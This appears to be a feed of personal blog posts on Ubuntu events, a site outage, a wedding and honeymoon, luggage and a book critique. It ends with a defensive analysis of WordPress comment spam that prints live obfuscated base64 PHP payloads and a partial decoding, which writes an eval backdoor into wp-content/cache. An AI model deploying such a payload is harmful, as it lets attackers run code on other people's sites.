magnio

For each Ubuntu release I spend a little time finding a toy or other representation of the codename animal to use at booths, Ubuntu Hours and other events. I wrote about Quetzals and Pangolins here and you may have seen Raring here.

When the salamander came up I was confident that a toy would be easy to find, and indeed they were! Even better, I found that the World Wildlife Fund offers a $50 Hellbender Salamander Adoption Kit that ships with 2 plush salamanders! Mine arrived yesterday, I’ll be keeping one to use at our events and will find a way to give away the other (perhaps as part of the Ubuntu Women contest we’re planning? Or at some LoCo event?).

Event decoration + helping to save the actual animal, hooray!

Oh, and it is a release late, but while I was in Mérida, Mexico we stopped in to Miniaturas where I picked up some adorable quetzal earrings:

I think I’ll wear them to our San Francisco Ubuntu Hour on June 12th, and bring along the salamander!

Originally published at pleia2's blog. You can comment here or there.

mark posting in

dw_maintenance

(For some California local definition of 'morning'!)

About 30 minutes ago one of our databases (sb-db03) locked up and stopped serving traffic. This was an active database, so the site quickly stopped when it could no longer serve requests. Alas.

I have failed us over to a backup database and now everything should be working again.

I'm not sure yet what happened to db03, but am currently investigating and will update this post if I come up with a root cause for the problem. Edit: It's back up and doesn't have any visible problems. Disks are fine, data's intact, etc. The graphs and logs show nothing. We'll have to keep an eye on it and see if it manifests further issues.

Sorry for the trouble, please let me know if you still see any problems!

pleia2

Since I left for my wedding and honey moon a bunch of things happened! Ubuntu 13.04 was released, 13.10 was given the code name “Saucy Salamander” and Debian 7.0 Wheezy came out. Plus lots of exciting OpenStack development discussion that came out following the Summit (I left right after it). When I got back into the country on the 12th I had a lot to catch up on! I did my best to cram before sessions and certainly had to limit involvement to a handful of sessions that I was particularly keen on attending and so could get up to speed with quickly.

This was the first virtual UDS I was able to participate in, so it was all new to me. Essentially the the “fish bowl” (as seen here, I took this photo from my spot in the wider attendee seating) is replaced by a Google Hangout and the “wider attendee seating” is an IRC channel. For the 4 sessions I participated in this worked very well, session leads were pro-active about asking who wished to participate in the Hangout so everyone who wanted to was able to. A great deal of attention in all these sessions was given to the IRC channel, which is a contrast with in person UDS where the channel can sometimes get a bit left behind (even though it’s being projected, it was easy to forget once you get talking). I didn’t use the summit.ubuntu.com page for anything aside reference, preferring to pop out the etherpad and use my standard IRC client, but I appreciated it all being there as a resource (and I’m sure it was super helpful for newcomers to follow along!).

Cheri Francis and others in the Ubuntu Women session

I found the sessions I participated in to be productive and focused and when applicable resulted in a solid list of action items. I hope that the event also lessened the experience gap that was always present for in person vs. remote participants, we all got the same experience. Now I have to admit to not being a fan of using Google Hangouts for this (I like Google, but it is still a proprietary, closed-source tool that we have no control over), but I understand that the ease of use and immediate availability of videos on YouTube makes a compelling case. Perhaps my only other complaint is lack of cohesiveness that comes from an online event, I didn’t watch the introduction or the wrap up. I also didn’t participate in the “beer hangout” – I didn’t even know it was happening, and sitting in front of my computer with a beer in the middle of the day wasn’t particularly interesting to me. I only attended a few specific sessions and there was no “wandering into something that looks interesting” (instead I just went back to work) or the regular social down time we get to relax or sit down to hack on things. I do hope we can find some kind of replacement for the in-person events, it would be great to see something on the LoCo team level at conferences where we seek to have an expanded Ubuntu presence focused on contributors (perhaps an Ubucon with a participant track?).

And the venue… it was at home! In order to participate in the hangout I did feel the need to leverage my multiple monitors.

My desk is a bit chaotic

Now the sessions themselves…

– Planning for Ubuntu Community presence on the Ubuntu Website –

This was not a particularly productive session as far as action items were concerned, but it turns out that while I was gone the removal of the “Community” link from ubuntu.com took on a life of its own (and boy was I surprised to see my name end up in a recent Datamation article about it). Personally I was satisfied with Daniel Holbach’s blog post on the subject a day after the change was made, but it was nice to speak with with some folks from the Design team and allow everyone to confirm that no ill will was intended and that plans for a new and improved community site were moving forward. The session was kept short given the more structured session about the community site specifically planned for the following day.

YouTube video of the session here

– Ubuntu Women UDS-1305 Goals –

Huge thanks to Silvia Bindelli and Cheri Francis for doing all of the leg work for this session while I was gone, I felt very comfortable reviewing their pre-session notes and found a really great, collaborative environment upon joining in. The discussion began talking about an information scavenger-hung competition that the team will be doing in the coming months, seeking volunteers to assist. It then moved into a topic that I was really happy to see on the agenda – a user poll to see how the team could be most effective in serving our audience of women interested in Ubuntu. I find that the project needs a bit of an adjustment every couple of years to refocus on our current targets as Ubuntu and the open source ecosystem evolves, so I’m excited that we’re doing this. Finally, much of the session was spent discussing our intention to further collaborate with other groups seeking to encourage women in open source (and in technology in general).

YouTube video of the session here and I uploaded session notes here

– Revamping ubuntu.com/community –

Picking up from where discussion left off the previous day, this session was a focused on on concrete things that need to be done to get the proposed community website that was under development reviewed and published. I admit that job change + wedding planning had my attention diverted this past cycle so I wasn’t able to contribute to this project, but I made sure to spend time the night before to do a review of the content so I’d be prepared. I was able to go through some of my suggestions during the meeting and took a few action items to continue with a more thorough review and to collect some quotes and photos from the community to make the site more personal and approachable.

YouTube video of the session here and I uploaded session notes here

– Shaping a plan for the future of Ubuntu Documentation Team –

I can’t begin to say how pleased I was to see this session land on the agenda. The Ubuntu Doc team has been a very small team for a long time, and new contributors have struggled to participate as the docs for writing the docs got stale to a point where they were not useful. We’re at a very exciting time now where we have limited support from a couple of the (very busy!) former drivers of this team and at least two strong contributors who have committed to moving the project forward. The first thing on the agenda was addressing the updating of docs so that more contributors can get on-boarded. I was able to pitch in with a couple action items to nudge things along a bit, but I’m hopeful that this is the beginning of an exciting new phase for the team.

YouTube video of the session here and I uploaded session notes here

A Slimy Salamander (wait, you said Saucy?)

– Xubuntu –

Since the event was online, the Xubuntu team took advantage of the flexibility and ended up pulling their sessions from UDS proper and scheduling our sessions for the hour after UDS each day to tackle a series of blueprints designed for the coming months. I was able to use my YouTube account + Hangouts to replicate that portion of what main UDS was doing.

Discussion of most interest to me centered around our testing+release plans (should we do alphas? betas? which ones?) and documentation, but discussion of our limited developer force (want to grow it!), a proposal for a shortcut overlay and default applications also were discussed. A much better summary was posted on the Xubuntu website yesterday: Looking towards Xubuntu 13.10. Pasi Lallinaho also wrote bullet-point style summaries of Night 1 and Night 2 which include links to their respective YouTube videos.

In all, a productive UDS for me, I have a lot of work to do… :)

Originally published at pleia2's blog. You can comment here or there.

pleia2

The second half of our honeymoon was full of adventure (and ok, a bit more luxury). We decided to spend 5 days traveling through the Yucatan peninsula visiting Mayan ruins, cenotes and local cities. We wanted our visit to be stress-free so MJ did some research and found William Lawsons Personal Driving Service which would not only take us around the peninsula but our driver would also be a registered tour guide! We met our guide, Angel, at the resort on Tuesday morning to begin our adventure.

Our first visit was to the ruins of Ek’ Balam. This was a really cool site, with multiple structures to climb, including the huge main temple. It wasn’t until I climbed to the top that I fully appreciated how hot it was out (and that I hadn’t brought enough water!).

More photos from Ek’ Balam

I was pretty tired after wandering around those ruins in the heat, so I was delighted when our tour guide was able to find Cenote Hubiku, just north of Valladolid where we were spending the night. A cenote is a “a deep natural pit, or sinkhole, characteristic of Mexico, resulting from the collapse of limestone bedrock that exposes groundwater underneat” (wikipedia). There are thousands in the Yucatan and many that are equipped for people to swim in. Cenote Hubiku had a small admission fee and full, modern facilities for changing before swimming. We caught them at the tail end of their day, but got a good 20 minutes of swimming in the beautiful, cool cenote before being on our way. It was the perfect thing for post ruin exploration.

Photos from Cenote Hubiku.

For dinner we went to Taberna de los Frailes for a delicious dinner that included a grilled watermelon with cheese appetizer (which I wouldn’t have ordered, but the waiter recommended it). We retired for the night at Casa Hamaca Guesthouse which was a cute little inn in the heart of Valladolid. Even better, the proprietor Denis Larsen is a northeast US expat who was exceptionally welcoming and helpful the next morning as we enjoyed banana pancakes and chatted about everything from our shared love of Google Docs for collaboration to tips for the rest of our stay in the Yucatan.

We then spent the day exploring the beautiful city of Valladolid. We visited the small San Roque Museum and then spent some time walking around the main square. From there we did some shopping and I picked up a couple of the traditional embroidered blouses that Valladolid is famous for. We also got a couple of brimmed hats for further ruin exploration. Mid-day we met up with Angel who took us to the Convent of San Bernardino de Siena and Cenote Zaci – a cenote right in town! We didn’t swim but it was nice to visit.

Photos from Valladolid

Come late afternoon it was time to start driving toward Mérida to check in to Hacienda Xcanatun boutique hotel for the night. This former hacienda was one of the many in the region that used to be a sisal (fiber) plantation. This was my favorite hotel. The rooms were sprawling and while modernized, still held an architectural feel and basic layout similarities to what I’d expect from and old hacienda. We had dinner at their famous on-site restaurant of the same name.

Photos from Hacienda Xcanatun

The next day was Uxmal! Plus a couple other sites on the Puuc Route. Uxmal was a major city and so touring the ruins takes several hours. We managed to see most of it and had a lot of fun climbing around several of their major structures (only the largest and a few minor sites had climbing prohibited). This site really rivals Chichen Itza in how big and amazing the ruins are, definitely one of my favorites.

More photos from Uxmal

Next on our list to visit for the day was Kabah. Most amazing about this place was its famous “Palace of the Masks” which was a whole building covered on one side with ornate faces of stone. You’re allowed to climb up to and around the palace, making this probably my favorite small site we visited.

More photos from Kabah

The last ruin site we visited was Sayil where we just visited the Palace of Sayil (the site was very spread out, with buildings up to 1 mile apart). Like so many of these palaces, it was an impressive and imposing sight! No climbing up the structure allowed though.

Photos from Sayil

Our final new site of the day was the Ecomuseo del Cacao. Our first hint that this place wasn’t quite up to par with the rest of our day was the clue from Angel that, while a traditional Mayan thing, cacao doesn’t actually grow naturally in the Yucatan because it’s not humid enough. The museum had it’s moments but was a bit too polished and cheesy. It was nice visiting the grove of artificially maintained cocoa trees and the hot chocolate tasting at the end was probably worth the entrance fee.

Photos from Ecomuseo del Cacao

From there we headed back to Uxmal for a sound and light show. I hadn’t read great things about it online, so I was prepped for something really cheesy, but I admit having really enjoyed it. The main track being broadcast is in Spanish, but you can rent headphones in several languages so you can hear the stories going along with the show that paint a picture of what it may have been like in the height of civilization there. It was also then that I noticed how beautifully clear the sky was out there, you could see so many stars.

That night we checked into Hacienda Temozon. It was a beautiful property, advertisements for it are quick to tell you that Bill Clinton stayed there once and the only owned by a major American company. The rooms were large, but it turns out perhaps not the right place to stay during ant season. Staying true to some of the age of the place, it didn’t have glass on the windows so everything was quite open-air and the doors covering the windows didn’t seal (you could put your finger through some of the gaps). I did enjoy a wonderful Mexican omelette in the morning.

Photos from Hacienda Temozon

Angel picked us up in the late morning and, knowing our interest in cenotes, decided to take us to a less touristy one that he knew of, Cenote Kankirixché. It wasn’t a fancy, staffed cenote like the previous ones we’d been to, we had to change in the van and then it was just a hole in the ground and a somewhat questionable wooden staircase taking you down to the water. It was beautiful and refreshing though!

More photos from Cenote Kankirixché

From there we were off to the city of Mérida! First stop was to check in to the stunningly modern Rosas and Xocolate boutique hotel before heading across the street to the Anthropology and History Museum. The museum is located in the former Canton Palace and while all in Spanish the exhibits mostly spoke for themselves. My favorite exhibits were one of one of the earlier expeditions to the Yucatan where many of the Puuc sites we explored, seeing photos from those sites before they were uncovered and restored was really cool. They also had a local embroidery exhibit upstairs which, seeing them in context, made me really happy about my beautiful blouse purchases in Valladolid.

Then it was off to the Grande Plaza district of Merida where we had lunch at Amaro. We did some shopping and were able to visit the Casa de los Montejo and the Palacio de Gobierno with it’s captivating murals by Fernando Castro Pacheco. We enjoyed dinner back at the hotel and in all a relaxing night.

Photos from Mérida

Unfortuantely the adventures had to come to an end at some point, our last day was spent visiting the famous Chichen Itza.

Chichen Itza is a huge settlement and we spent over 3 hours exploring it. It was more crowded than any of the other sites we went to, but the benefit of going in the hottest part of the year is that it wasn’t overwhelming with people at all. One of the interesting things about it though was while it’s expensive for tourists to enter (up to 5 times as much as other sites), the whole inside was filled with vendors! Angel told us it was because it used to be privately owned and they owner brought in all these vendors, and when it was transferred to more government run thing they kept the vendors. At first it was a little off-putting to have so many vendors throughout the archaeological site, but I came to realize that these vendors were selling on-topic keepsakes that tourists (including myself) were interested in buying, and technically these people are descendants of the Mayans who built this city – this is theirs. It also brought a liveliness to the site that was lacking at the other sites, I appreciated them by the time we were wrapping up our day there. And what a day. You couldn’t climb any of the ruins but it’s probably for the best, even just walking among these giants in the heat was enough to tire me out considerably.

More photos from Chichen Itza

We spent our last night in Mexico in Cancun so we’d have easy access to the airport the following morning. MJ picked a hotel on the beach where we could have a romantic private cabana dinner. Perfect wrap up to our honeymoon :)

Originally published at pleia2's blog. You can comment here or there.

bokunenjin

As I hear friends and acquaintances express eagerness to see the Ender's Game film that will be released this fall, I have a hard time responding. I want to ask, have you read the book? After you were fifteen years old? And you enjoyed it? I can't understand how it won the awards it did. It's not just poorly written, it's repugnant. John Kessel articulates why in his essay Creating the Innocent Killer:
Ender's Game, Intention, and Morality. An excerpt:

We see the effects of displaced, righteous rage everywhere around us, written in violence and justified as moral action, even compassion. Ender gets to strike out at his enemies and still remain morally clean. Nothing is his fault. Stilson already lies defeated on the ground, yet Ender can kick him in the face until he dies, and still remain the good guy. Ender can drive bone fragments into Bonzo’s brain and then kick his dying body in the crotch, yet the entire focus is on Ender’s suffering. For an adolescent ridden with rage and self-pity, who feels himself abused (and what adolescent doesn’t?), what’s not to like about this scenario? So we all want to be Ender. As Elaine Radford has said, “We would all like to believe that our suffering has made us special—especially if it gives us a righteous reason to destroy our enemies.”

But that’s a lie. No one is that special; no one is that innocent. If I felt that Card’s fiction truly understood this, then I would not have written this essay.

pleia2

On Tuesday the 30th we flew from Philadelphia to Cancun, Mexico. From there we took a shuttle south for about 40 minutes until we got to the Riviera Maya district and Grand Velas, the all-inclusive resort we had reservations at for the first week of our honeymoon.

We then spent a much-needed week relaxing.

We had a stunning view from our room.

Hours to spend relaxing on the beach, or in one of their several pools where they brought us all the food and beverages we wanted.

Plus, chocolate strawberries.

I read my way through several books that I’d been wanting to read but never could find time for. Pretty much the only decision we needed to make all week was which of the top notch restaurants they had on site for each meal. I quite enjoyed room service for breakfast.

More photos from our stay: http://www.flickr.com/photos/pleia2/sets/72157633490351996/

We did end up making one excursion during the week, and that was to Rio Secreto, a nearby series of underground caves and waterways. I wasn’t sure what to expect since it was quite close to such a touristy area (tourist trap?) but my expectations were surpassed in all ways. We were geared up with water shoes (we opted to buy new ones for $10/pair), helmets and wet suits and we had a great tour guide, but it was far from a risk-free, polished tourist experience. We got a real feel for the natural caves and we had an amazing time swimming through some of the pools we were taken through in our 3 hour tour through 600+ meters of cave.

A photographer came along with to take photos and we paid the charge to download them all royalty-free, I uploaded several of them here: http://www.flickr.com/photos/pleia2/sets/72157633479166189/

Alas, the luxurious stay had to come to and end at some point. The following Tuesday we packed up… but not to end our honeymoon! Instead we repacked to spend the next 5 days traveling through the Yucatán visiting Mayan ruins and modern Yucatán cities! But that’s for the next post…

Originally published at pleia2's blog. You can comment here or there.

pleia2

On Sunday April 28th MJ and I were married!

The day began gathering with mothers, my aunt and the bridesmaids in the bridal suite of the Joseph Ambler Inn where we and most of our out of town guests stayed. Inn Manager Keenan Christiansen and Brian Cottman really made us feel welcome throughout our stay and during all the planning.

My maid of honor, Danita Fries, took care of morning makeup and hair preparations, bringing in Daneene Jensen and her team to take care of hair and makeup for all of us. Not being a makeup person, I wasn’t thrilled about the idea of wearing it, but Daneene made me feel comfortable and was great about keeping the makeup light and the look very natural. MJ’s Best Woman even stopped by with refreshments in the late morning so we wouldn’t be without lunch.

We met with our photographer, Melissa Morelli, at 1PM to begin taking photos at the inn. She was the photographer MJ hired for our engagement and a few months back she also did my head shots. We were really happy to have her join us in Pennsylvania for the wedding.

After photos at the inn, we took a small bus chartered by 1st Class Transportation over to the wedding venue, Talamore Country Club.

The weather was beautiful, which was quite fortunate as the wedding was outdoors and Melissa was able to take some great pictures throughout the venue before the ceremony.

Everything began the signing of the Ketubah we selected by Amy Fagan of 20th Century Illuminations and the Badeken.

Then, the ceremony! We went back and forth about having a videographer for our wedding and decided to go with one from the Mixed Media Productions, the firm our DJ, Mike Robertson, runs. In retrospect I’m glad we decided to have one, the photos are great but I was so overwhelmed (happy! excited! nervous!) that I can’t say I actually remember that much of the ceremony :)

It all went very smoothly. My mother and grandfather walked me down the aisle. We were honored to have Rabbi Elliot Holin work with us on the ceremony and finally to officiate.

We also held our reception at Talamore, starting with a cocktail hour in the garden room (this room was also backup for ceremony had it rained). Then dinner in their main ballroom which was decked out with the amazing flower centerpieces by Moles Flowers.

The rest of the reception was also pretty traditional, short speeches from family and friends, a first dance and cake! We selected a multi-flavor cake from Bredenbecks and I made sure to have a bit of each ;)

And in addition to being able to talk to many of our guests, we even danced a bit! It was an amazing night.

Afterwards we had a bit of an after party back at the Inn, giving us time to kick back and relax for a couple hours with some of our guests.

In all, things went as perfect as I could have imagined thanks to MJ’s attention to detail throughout the process along with some great vendors who were able to work with us on requests.

We’ll be updating our website in the coming weeks with tons more photos and other details of our wedding weekend which included family and wedding party dinners.

Originally published at pleia2's blog. You can comment here or there.

terriko

Luggage with a built-in scooter is awesome. I've seen ride-on wheeled luggage for kids (and coveted it mightily), and this appears to be the adult-friendly equivalent. Sadly, does not meet a lot of my other criteria (I'd be shocked if they let me avoid gatechecking this) and it's $250 (But at least shipping is free...). I'm tempted just for the awesome factor.

Here's a small hard case that meets a lot more of my criteria. It clocks in at 35cmx39cmx23cm (that's 14"x15"x9" for those of us who have to fly in America) and comes in cheerful colours. I'm actually not sure which one I'd choose -- normally I shun the pinks but that dark one is pretty lovely and would fit nicely into some sort of business-travelling fashionista persona if I dressed the part with some business casuals. But maybe the green or red would be less likely to clash with my existing wardrobe.... Honestly, I'm approaching this project much like I do cosplay, and now that I think about it it's not really that different: I'm playing for an audience to believe me to be someone very specific. Nevermind that I'm still projecting a variant on me; it's all the same body language, fashion, and carefully chosen accessories that make it work.

Similarly, a bright orange gem that could probably work with the persona too. 36x44x20cm (14x17x8") for that one, and only two wheels tucked into the edges so probably a bit more packing space in the final tally.

But despite the obvious appeal for my in-progress traveler persona, I'm not seeing any useful way for me to get reviews of these that I can actually understand since they're shipping from Hong Kong, and I haven't quite decided if I really should be making a hundred dollar gamble just because the colours are fun. I wonder if it's possible to find something similar that's at least a little more local to me? I have learned the useful new search terms "rolling business case" but it's mostly been turning up uninspired blackness.

Incidentally, I *did* check the wirecutter and they do have a section on bags, just not the kind I'm looking for. Bags are one of those few things I'm exceptionally picky about (especially right now while mildly injured, but even when not I tend to have precise requirements) so it probably isn't that much of a loss. They're apparently looking for a freelance bag editor and I rather wish I were actually the right person for that job. Lot of work for little pay, but a chance to try lots of bags!

puzzlement posting in

incrementum

One of V's favourite gambits at the moment is flat-out contradicting me.

"Yes, that goes on the left foot, good." "No, that's the RIGHT. It's the RIGHT!"

This afternoon I asked him to put yoghurt back in the fridge so it would be nice and cool, he said "NO, nice and WARM."

terriko

I currently own a 20" rolling carry-on bag that has met my airline & train travel needs for years (I switched to it a year or two before airlines started charging for checked bags), and it's perfect for a week-long conference where I'm coming back or going out with a lot of stuff, or when I'm visiting my parents for close to a month at Christmas, but it seems excessive when I'm going for a weekend trip or a job interview.

I'm considering getting a smaller suitcase for those shorter trips, so I'm working out my requirements. This thread covers more or less what I have in mind, but here's some personal preference/requirement notes:

1. Must have wheels. I used to do backpack+purse for shorter trips, but I've been finding that I often pinch a nerve during travel and I'm pretty sure carrying my camera/laptop on my back is a factor.

2. Can fit my laptop and possibly SLR camera + 2-3 days worth of clothes. Thankfully my clothes are pretty small. Camera may be optional: I'm trying a downgrade to a point and shoot for short trips.

3. Preferably I'd like something that can fit into the overhead bin on the smaller regional jets, since often my flight will have one hop with those. A search says that this means the bag will have to be around 18Lx14Wx7D. Sounds like you can fit larger, but I'd rather not have to argue it out with the gate staff / flight attendant every time. I am perfectly ok with being given a checked tag and then "obliviously" carrying my bag on the plane anyhow as long as it will fit, though.

4. Butnot arguing with the gate/flight staff every time I fly would be awesome. This may mean going with something more backpack-like so I can just put it on my back when I walk on the plane, but mostly it just reinforces "small" and "looks like it holds a laptop." Briefcases should work.

5. Should have an open clothing section as opposed to a bunch of filefolder divider things that will make it harder to pack.

6. Should open fully, at least for the clothing section. Pure preference on my part.

7. I'm not too picky about laptop sleeves, although something I can easily slip a laptop out of for the TSA or in case I do have to check the bag is good. I basically never use my laptop on the plane, I just don't want to skycheck it.

8. If at all possible, not black. Something like 90% of the suitcases I see are black and I don't want to be worrying about someone grabbing mine by mistake.

9. But (and i realize this may contradict the "not black" thing) something that looks more business traveller-y would be good. I have a *lot* of trouble with TSA reps assuming I'm young or an infrequent traveler which is especially frustrating when I go somewhere with J and they immediately assume he's an expert while I get the "oh, hon, you know our machines are perfectly safe?" talk-down-to-the-little-girl spiel. (My new response: "My sister is a physicist who works in health and safety; I'd like to opt out." which is factually true but irrelevant and calculated to throw them and possibly nearby travelers out of their default headspace without getting into an argument.)

I've been finding that
(a) A disturbing number of online sites don't give pictures of the inside of the bags.
(b) A disturbing number of online sites don't give dimensions or even pictures that could help me guess the dimensions
(c) Bags are expensive (duh)
(d) There is an entire market for "women's suitcases" which I find somewhat strange. Particularly given that the "women's briefcase-bags" seem pretty much identical to the non-women's ones.

I don't have any short trips scheduled, but I'm hoping to find some bag options I like and catch a sale (luggage goes on sale quite frequently, so it's a bit ridiculous to pay full price if I've got time to spare).

I would love to hear first hand testimonials from any of you who travel with a bag that might meet my needs, though. It was a recommendation from Linuxchix that drew me to my current bag which has done me pretty well although it's starting to show its age now.

terriko

WARNING: This entry contains some actual malicious code. I've HTML-escaped it so that it isn't going to get executed by you viewing it, but it was clearly intended to attack Wordpress blogs, so if you're going to mess around with analyzing, do it in a browser that's not logged in to any Wordpress blog.

So I was clearing spam queues this morning, and came across a bunch of spam with this string in it:


eval(base64_decode(‘aWYoJGY9Zm9wZW4oJ3dwLWNvbnRlbnQvY2FjaGUvaWZvb2FnLnBocCcsJ3cnKSl7ZnB1dHMoJGYsJzw/cGhwIC8qTiVQYCUqL2V2YWwvKklmXCcsLSovKC8qPjZgSGUqL2Jhc2U2NF9kZWNvZGUvKkBNKTIqLygvKn46SDUqL1wnTHlwM1kyQTdjQ292YVdZdktuY2hibHNxTHlndktsNXpXeUZVY25CUktpOXBjM05sZEM4cVVFZzBPWHhBS2k4b0x5cDRZR3BXS1U0cUx5UmZVa1ZSVlVWVFZDOHFjaUI0S2k5Ykx5b29mbEZ4S2k4bll5Y3ZLakUvUUdWMFd5b3ZMaThcJy8qT3pNNTIwKi8uLyo5SissKi9cJ3FQU3dwS2k4bmVpY3ZLblZVUVRrektpOHVMeXBEZTBjNlFEUmNLaThuYkNjdktqaDBJRzhxTHk0dkttMTVUVDA4UkdBcUx5ZDZKeThxZUdkbk1YWTJNU292TGk4cVZuQkpaelFxTHlkNUp5OHFaWHhxZVVFcUx5NHZLaXgyS0NvdkoyXCcvKnlBdCYqLy4vKkA1RHcmXU4qL1wnd25MeXBHTFZGdlREUXFMMTB2S21KaGEwMHBLaTh2S2x3N2MyNHFMeWt2S2s1M1Mwa25YeW92THlwUFgyc3FMeWt2S2toQVlVczBWQ292WlhaaGJDOHFNazU4TWpBK0tpOG9MeXBWYzBodFdWMWxXaW92YzNSeWFYQnpiR0Z6YUdWekxcJy8qWWFiayovLi8qT35xcyovXCd5bzhTR2N6S2k4b0x5cFZRVXRoWmlvdkpGOVNSVkZWUlZOVUx5cFdMa3RVSUhzcUwxc3ZLa3N0TG1NcUx5ZGpKeThxU0c5b0tpOHVMeXBZVGp0SEtpOG5laWN2S2pzbU15Z3lNV1FtWFNvdkxpOHFPMUJQZFNvdkoyd25MeXBaV1ZBelwnLyp7WUp9MSovLi8qdisoLTtrKi9cJ2VuVXFMeTR2S2xWc2FWVXRLaThuZW5sc0p5OHFSbFJaWERRcUwxMHZLazQvVW1JK0syWXFMeThxU3l0TFF5b3ZLUzhxYkVCcUtpOHZLbUpZUENvdktTOHFPbG8yVlVVb1NrSTRLaTh2S2tKWFp6dEFTeW92T3k4cVJUc3JkaWRKS2k4PVwnLyooa0NwQFk+Ki8pLypgYmMqLy8qSHZeISovKS8qV21GKi8vKlBfV2VgYD57Ki87LyotfGxURTEqLz8+Jyk7ZmNsb3NlKCRmKTt9′));

Or this clearly related one (note that the top of the string is the same):


aWYoJGY9Zm9wZW4oJ3dwLWNvbnRlbnQvY2FjaGUvaWZvb2FnLnBocCcsJ3cnKSl7ZnB1dHMoJGYsJzw/cGhwIC8qcGshV1UqL2V2YWwvKnpDRnI4ejQqLygvKi1mJWYmZyovYmFzZTY0X2RlY29kZS8qY2hIIG0qLygvKnZXXnEqL1wnTHlvL05tcHlLaTlwWmk4cU9ENUpUM2NxTHlndktsdHZLU292YVhOelpYUXZLa2M2WTNRcUx5Z3ZLaUZQWERrcUx5UmZVa1ZSVlVWVFZDOHFjU3R5S1RGNklDb3ZXeThxV0RkblNDb3ZcJy8qd0VEJSovLi8qWnA2OnIqL1wnSjJNbkx5b2hSU0VxTHk0dktrZEVSU3RrS2k4bmVpY3ZLa2NyUUVZd09Db3ZMaThxUFU5RUxqQTZUaW92SjJ3bkx5cDhkRE14UkNvdkxpOHFLVFIwT2xoc2MyZ3FMeWQ2ZVd3bkx5cFRcJy8qQ01MRzEqLy4vKmlUeVUwflAqL1wnVFZBdFFTb3ZYUzhxSnpaUFR5MHFMeThxVFZOYlpDb3ZLUzhxWEU1TU1Tb3ZMeXB1SjFzcUx5a3ZLaVZ5Y0N4aEtpOWxkbUZzTHlwTkxseHBLaThvTHlwdFVtNDFJSGxTS2k5emRISnBcJy8qXXgyZCovLi8qIG5SKi9cJ2NITnNZWE5vWlhNdktrbytiRGhrS2k4b0x5bzFOa3hZVTB0Z1RTb3ZKRjlTUlZGVlJWTlVMeXBPWGt0YVF6d3FMMXN2S201TWNrWXpjeUFxTHlkakp5OHFiQ3RLY2lvdkxpOHFUUzFuXCcvKmhccGhpKi8uLypjVz4qL1wnS2k4bmVpY3ZLaUZGTmlvdkxpOHFVeWRLUVNvdkoyd25MeXB1S1ZWQUxpb3ZMaThxYkZoV1BEOW9aU292SjNvbkx5cFZJRk1xTHk0dktqRkFlME1zS2k4bmVTY3ZLajk4V3lvdkxpOHFcJy8qPE9rNXBmKi8uLyo0VlhFKi9cJ1VtODJVeW92SjJ3bkx5cFZURm9xTDEwdktpWjNOQ292THlvL0xXWjVLaThwTHlvL01URXFMeThxSjN4ZlFTb3ZLUzhxT2psSlRGSXFMeThxYjBNeFFTY3JKU292T3k4cWVWbzVUeW92XCcvKiAzXCcqLykvKlpsWyUqLy8qLVRPJUdiNiovKS8qUyw3bjRTLCovLypCQ1sqLzsvKkxacHM8blNaKi8/PicpO2ZjbG9zZSgkZik7fQ==

As you can tell from the first sample, it's base64 encoded... something. b64 is pretty commonly used by attackers to obfuscate their code, so in case the spammy username and comment that went with the code wasn't enough to tell me that something bad was intended, the b64 encoding itself would have been a clue. If I didn't have the pretty huge hint of the base64_decode line, I might have been able to figure it out from the format and the fact that I know that b64 uses = as a padding (visible at the end of the second string).

Being a curious sort of person, I decoded the first string. In my case, I just opened up Python, and did this:


>>> import base64
>>> base64.b64decode(badstring1)
"if($f=fopen('wp-content/cache/ifooag.php','w')){fputs($f,'<?php /*N%P`%*/eval/*If\\',-*/(/*>6`He*/base64_decode/*@M)2*/(/*~:H5*/\\'Lyp3Y2A7cCovaWYvKnchblsqLygvKl5zWyFUcnBRKi9pc3NldC8qUEg0OXxAKi8oLyp4YGpWKU4qLyRfUkVRVUVTVC8qciB4Ki9bLyooflFxKi8nYycvKjE/QGV0WyovLi8\\'/*OzM520*/./*9J+,*/\\'qPSwpKi8neicvKnVUQTkzKi8uLypDe0c6QDRcKi8nbCcvKjh0IG8qLy4vKm15TT08RGAqLyd6Jy8qeGdnMXY2MSovLi8qVnBJZzQqLyd5Jy8qZXxqeUEqLy4vKix2KCovJ2\\'/*yAt&*/./*@5Dw&]N*/\\'wnLypGLVFvTDQqL10vKmJha00pKi8vKlw7c24qLykvKk53S0knXyovLypPX2sqLykvKkhAYUs0VCovZXZhbC8qMk58MjA+Ki8oLypVc0htWV1lWiovc3RyaXBzbGFzaGVzL\\'/*Yabk*/./*O~qs*/\\'yo8SGczKi8oLypVQUthZiovJF9SRVFVRVNULypWLktUIHsqL1svKkstLmMqLydjJy8qSG9oKi8uLypYTjtHKi8neicvKjsmMygyMWQmXSovLi8qO1BPdSovJ2wnLypZWVAz\\'/*{YJ}1*/./*v+(-;k*/\\'enUqLy4vKlVsaVUtKi8nenlsJy8qRlRZXDQqL10vKk4/UmI+K2YqLy8qSytLQyovKS8qbEBqKi8vKmJYPCovKS8qOlo2VUUoSkI4Ki8vKkJXZztASyovOy8qRTsrdidJKi8=\\'/*(kCp@Y>*/)/*`bc*//*Hv^!*/)/*WmF*//*P_We``>{*/;/*-|lTE1*/?>');fclose($f);}"

(Well, okay, I actually ran cgi.escape(base64.b64decode(badstring1)) to get the version you're seeing in this blog post since I wanted to make sure none of that was executed in your browser, but that's not relevant to the code analysis, just useful if you're talking about code on the internet)

So that still looks pretty obfuscated, and even more full of base64 (yo, I heard you like base64 so I put some base64 in your base64). But we've learned a new thing: the code is trying to open up a file in the wordpress cache called ifooag.php, under wp-content which is a directory wordpress needs to have write access to. I did a quick web search, and found a bunch of spam, so my bet is that they're opening a new file rather than modifying an existing one. And we can tell that they're trying to put some php into that file because of the <?php and ?> which are character sequences that tell the server to run some php code.

But that code? Still looks pretty much like gobbledegook.

If you know a bit about php, you'll know that it accepts c-style comments delineated by /* and */, so we can remove those from the php code to get something a bit easier to parse:


